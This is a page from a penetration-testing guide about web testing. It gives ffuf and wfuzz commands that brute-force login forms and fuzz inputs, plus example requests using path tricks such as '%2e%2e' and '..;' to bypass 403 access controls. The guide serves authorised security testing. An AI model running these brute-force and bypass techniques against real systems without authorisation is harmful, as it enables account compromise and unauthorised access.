The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Form fuzzing
  • Bypass Forbidden

WEB

Last updated 5 months ago

Introduction

Nowadays, websites are programmed using various technologies such as databases, web development frameworks, programming languages, APIs, data formats, protocols and browsers. Each of them has specific vulnerabilities that the developer should be aware of, which is not always the case, as you can see in .

This section contains several vulnerabilities worth checking if you encounter a web pentesting.

Form fuzzing

During a web vulnerability assessment, it is for sure that the web page might have one or several post forms asking for user data.

Fuzzing the forms might allow you to brute force credentials or discover vulnerabilities like SSTI, SQLi, XSS, etc.

ffuf -w "./usuarios.txt:USERS" -w "./wordlist.txt:PASSWDS" -t 60 -u http://<URL>/login  -H "Content-Type: application/json;charset=utf-8" -X POST -d '{"username":"USERS","password":"PASSWDS"}'

There might also be the case that you need to encode the data (URL format, base64, etc.) before sending it to the server. For doing so, you need to use wfuzz because ffuf doesn't support it.

wfuzz -u http://<URL>/search -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d 'name=FUZZ'  -z file,/usr/share/wordlists/SecLists/Fuzzing/special-chars.txt,urlencode

Bypass Forbidden

If the web service is misconfigured, you can try several techniques and tools to bypass filters.

GET /admin ==> 403 Forbidden
GET /blablabal/%2e%2e/admin ==> 200 OK
GET /blablabal/..;/admin ==> 200 OK
GET /blablabal/;/admin ==> 200 OK
GET /blablabal/admin/..;/ ==> 200 OK
GET /admin?access=1 ==> 200 OK

There are several tools that you can use to try to bypass such filters:

Note: If you want to try all them at the same time you can use to install such tools and to use them.

OWASP Top Ten
bypass-url-parser
dontgo403
forbidden
byp4xx
403bypasser_installer.sh
403bypasser.sh